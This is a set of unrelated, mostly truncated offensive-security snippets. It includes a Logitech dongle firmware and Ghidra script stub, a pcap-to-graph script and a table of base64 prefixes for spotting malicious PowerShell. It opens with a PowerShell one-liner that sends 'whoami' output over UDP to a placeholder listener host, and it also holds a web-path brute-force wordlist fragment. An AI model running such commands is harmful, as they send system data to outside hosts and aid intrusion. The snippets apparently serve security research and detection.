```powershell
# On your host:
# $ nc -lnvup 53
# Replace <HOSTIP> with ip of the listening machine
powershell -nop -c "$s=New-Object System.Net.Sockets.Socket([System.Net.Sockets.AddressFamily]::InterNetwork,[System.Net.Sockets.SocketType]::Dgram,[System.Net.Sockets.ProtocolType]::UDP);$s.Connect((New-Object System.Net.IPEndPoint([system.net.IPAddress]::Parse(\"<HOSTIP>\"),53)));$s.send(([System.Text.Encoding]::ASCII).GetBytes((whoami)));"
```
```python
# 0. place this script in your ghidra_script directory
# 1. open the target nRF24LU1P binary in Ghidra
# 2. open the python shell in Ghidra
# 3. `import logitech; l = logitech.logitech(currentProgram); l.do_it()`
import ghidra
from ghidra.program.model.symbol import SourceType
class logitech(object):
    def __init__(self, currentProgram):
```
```python
#!/usr/bin/env python
# sorry this is Python 2 -- the bootloader trigger breaks with Python 3 and I was too lazy to debug
import usb, time, struct
# Logitech Unifying dongle
class unifying_dongle:
    # constructor
```
```python
#!/usr/bin/env python3
from scapy.all import *
from py2neo import Graph, Node, Relationship
packets = rdpcap("<your_pcap_file>")
g = Graph(password="<your_neo4j_password>")
for packet in packets.sessions():
    pkt = packet.split()
```
Base64 Code | Mnemonic Aid | Decoded* | Description |
---|---|---|---|
JAB | 🗣 Jabber | $. | Variable declaration (UTF-16), e.g. JABlAG4AdgA for $env: |
TVq | 📺 Television | MZ | MZ header |
SUVY | 🚙 SUV | IEX | PowerShell Invoke Expression |
SQBFAF | 🐣 Squab favorite | I.E. | PowerShell Invoke Expression (UTF-16) |
SQBuAH | 🐣 Squab uahhh | I.n. | PowerShell Invoke string (UTF-16) e.g. Invoke-Mimikatz |
PAA | 💪 "Pah!" | <. | Often used by Emotet (UTF-16) |
```
/
$$$lang-translate.service.js.aspx
$367-Million-Merger-Blocked.html
$defaultnav
${idfwbonavigation}.xml
$_news.php
$search2
£º
.0
/0
```
```python
#!/usr/bin/env python3
# TROOPERS2019
# @doegox
# The script will resize the image and convert it to BW image if needed but
# I would advise to do it yourself first with e.g. Gimp for a better control
# of the aspect ratio and the BW threshold.
# Target: 296x128, black & white (no grey)
# Shall we display the result locally?
```